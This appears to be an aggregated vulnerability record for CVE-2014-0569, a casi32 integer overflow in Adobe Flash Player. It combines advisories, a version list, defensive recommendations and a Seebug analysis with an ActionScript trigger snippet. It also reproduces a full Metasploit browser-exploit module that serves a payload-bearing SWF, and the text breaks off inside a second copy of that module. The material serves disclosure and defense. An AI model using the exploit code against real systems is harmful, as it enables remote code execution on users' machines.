Adobe Flash Player casi32 Integer Overflow Remote Code Execution Vulnerability
2014-10-14T00:00:00
ID ZDI-14-365 Type zdi Reporter bilou Modified 2014-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the implementation of casi32. The issue lies in the failure to properly sanitize a user-supplied length value with a specific array implementation. An attacker can leverage this vulnerability to execute code within the context of the current process.
CVE CVE-2014-0569
CVSS 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)
References
http://www.zerodayinitiative.com/advisories/ZDI-14-365
https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
{"cve": [{"lastseen": "2019-05-29T18:13:43", "bulletinFamily": "NVD", "description": "Integer overflow in Adobe Flash Player before 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Windows and OS X and before 11.2.202.411 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302 allows attackers to execute arbitrary code via unspecified vectors.", "modified": "2017-10-07T01:29:00", "id": "CVE-2014-0569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569", "published": "2014-10-15T10:55:00", "title": "CVE-2014-0569", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:19:29", "bulletinFamily": "exploit", "description": "### Vulnerability type: integer overflow vulnerability\r\n### Affected components: Adobe Flash Player, Adobe AIR SDK and Adobe AIR SDK & Compiler are all products of the US company Adobe. Adobe Flash Player is a multimedia player; Adobe AIR SDK and Adobe AIR SDK & Compiler are standard development kits for Adobe AIR (a cross-operating-system runtime environment). \r\n## Vulnerability analysis:\r\n### Cause:\r\nIn ActionScript 3.0, the avm2.intrinsics.memory.casi32 function suffers an integer overflow while performing a memory operation, so the offset of the memory operation is not checked correctly, which leads to out-of-bounds memory reads and writes. This allows the length field of a Uint Vector to be overwritten, after which the ActionScript 3 Sound object is used to leak a base address, build a ROP chain, run shellcode, and so on.\r\n### Detailed analysis:\r\nThe casi32 function: casi32 is one of the ActionScript 3 functions for operating on domainMemory; domainMemory is a utility class that was added to speed up memory read and write operations.\r\ncasi32(addr:int, expectedVal:int, newVal:int):int\r\nThe function's semantics are \"Compare And Swap\": the first parameter, addr, is the memory address to operate on (relative to domainMemory), the second parameter, expectedVal, is the value to compare against, and the last parameter, newVal, is the value to swap in.\r\n\r\nThe function's internal length check contains an integer overflow, so the check is incorrect (for the debugging details see [http://weibo.com/p/1001603769606924861349](http://weibo.com/p/1001603769606924861349) or [https://blogs.technet.microsoft.com/mmpc/2014/11/05/cracking-the-cve-2014-0569-nutshell/](https://blogs.technet.microsoft.com/mmpc/2014/11/05/cracking-the-cve-2014-0569-nutshell/)).\r\nIn this way we can construct the conditions for exploitation, first using Flash vectors to set up a memory layout in which a ByteArray and a Uint Vector are adjacent.\r\n\r\n### Code:\r\n```\r\n// Predefined ByteArray object, size 0x1000\r\n_local3 = (this.orlyfx[_local1] as ByteArray);\r\n// Set domainMemory to _local3\r\nApplicationDomain.currentDomain.domainMemory = _local3;\r\n// Compare the length of _local3 with 0x1000; if they are equal, set the length of _local3 to 0.\r\n// The memory is not released immediately: the array still holds its 0x1000 bytes.\r\n_local3.atomicCompareAndSwapLength(0x1000, 0);\r\n// Call casi32; the integer overflow inside casi32 changes the execution flow, so 0x40000001 is written successfully at offset 0x1000 from _local3\r\nif(casi32(0x1000, 1022, 0x40000001) == 1022)\r\n```\r\n\r\nThe later steps (using the ActionScript 3 Sound object, leaking a base address, building the ROP chain and running shellcode) can be seen in the code at [http://www.myhack58.com/Article/html/3/62/2014/56259_2.htm](http://www.myhack58.com/Article/html/3/62/2014/56259_2.htm)", "modified": "2016-01-11T00:00:00", "published": "2016-01-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90366", "id": "SSV:90366", "type": "seebug", "title": "Integer overflow vulnerability in multiple Adobe products, CVE-2014-0569", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "symantec": [{"lastseen": "2018-03-14T06:07:58", "bulletinFamily": "software", "description": "### Description\n\nAdobe Flash Player and AIR are prone to an unspecified integer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. 
Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3650 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 
\n * Adobe AIR 3.9.0.1030 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR 4.0.0.1628 SDK \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Adobe Air Sdk 13.0.0.111 \n * Adobe Adobe Air Sdk 13.0.0.83 \n * Adobe Adobe Air Sdk 14.0.0.110 \n * Adobe Adobe Air Sdk 14.0.0.137 \n * Adobe Adobe Air Sdk 3.0.0.4080 \n * Adobe Adobe Air Sdk 3.1.0.488 \n * Adobe Adobe Air Sdk 3.2.0.2070 \n * Adobe Adobe Air Sdk 3.3.0.3650 \n * Adobe Adobe Air Sdk 3.3.0.3690 \n * Adobe Adobe Air Sdk 3.4.0.2540 \n * Adobe Adobe Air Sdk 3.4.0.2710 \n * Adobe Adobe Air Sdk 3.5.0.1060 \n * Adobe Adobe Air Sdk 3.5.0.600 \n * Adobe Adobe Air Sdk 3.5.0.880 \n * Adobe Adobe Air Sdk 3.5.0.890 \n * Adobe Adobe Air Sdk 3.6.0.599 \n * Adobe Adobe Air Sdk 3.6.0.6090 \n * Adobe Adobe Air Sdk 3.7.0.1530 \n * Adobe Adobe Air Sdk 3.7.0.1860 \n * Adobe Adobe Air Sdk 3.7.0.2090 \n * Adobe Adobe Air Sdk 3.8.0.1430 \n * Adobe Adobe Air Sdk 3.8.0.870 \n * Adobe Adobe Air Sdk 3.8.0.910 \n * Adobe Adobe Air Sdk 3.9.0.1030 \n * Adobe Adobe Air Sdk 3.9.0.1210 \n * Adobe Adobe Air Sdk 3.9.0.1380 \n * Adobe Adobe Air Sdk 4.0.0.1390 \n * Adobe Adobe Air Sdk 4.0.0.1628 \n * Adobe Adobe Flash Player 11 11.7 \n * Adobe Adobe Flash Player 11.1.115.17 \n * Adobe Adobe Flash Player 11.6.602.180 \n * Adobe Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 
10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 
10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe 
Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash 
Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 2 \n * Adobe 
Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 
9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Gentoo Linux \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SMNTC-70441", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70441", "type": "symantec", "title": "Adobe Flash Player and AIR CVE-2014-0569 Integer Overflow Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-06T15:44:43", "bulletinFamily": "exploit", "description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\n", "modified": "2017-07-24T13:26:21", "published": "2015-04-10T00:37:26", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_CASI32_INT_OVERFLOW", "href": "", "type": "metasploit", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\n 'Description' => %q{\n This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\n domainMemory for the current application domain. 
This module has been tested successfully\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bilou', # Vulnerability discovery\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['ZDI', '14-365'],\n ['CVE', '2014-0569'],\n ['OSVDB', '113199'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },\n :flash => lambda { |ver| ver =~ /^15\\./ && Gem::Version.new(ver) <= Gem::Version.new('15.0.0.167') },\n :arch => ARCH_X86\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 14 2014',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n platform_id = 'win'\n os_name = target_info[:os_name]\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" 
codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:37", "bulletinFamily": "exploit", "description": "", "modified": "2015-04-10T00:00:00", "published": "2015-04-10T00:00:00", "href": "https://packetstormsecurity.com/files/131382/Adobe-Flash-Player-casi32-Integer-Overflow.html", "id": "PACKETSTORM:131382", "type": "packetstorm", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player casi32 Integer Overflow', \n'Description' => %q{ \nThis module exploits an integer overflow in Adobe Flash Player. 
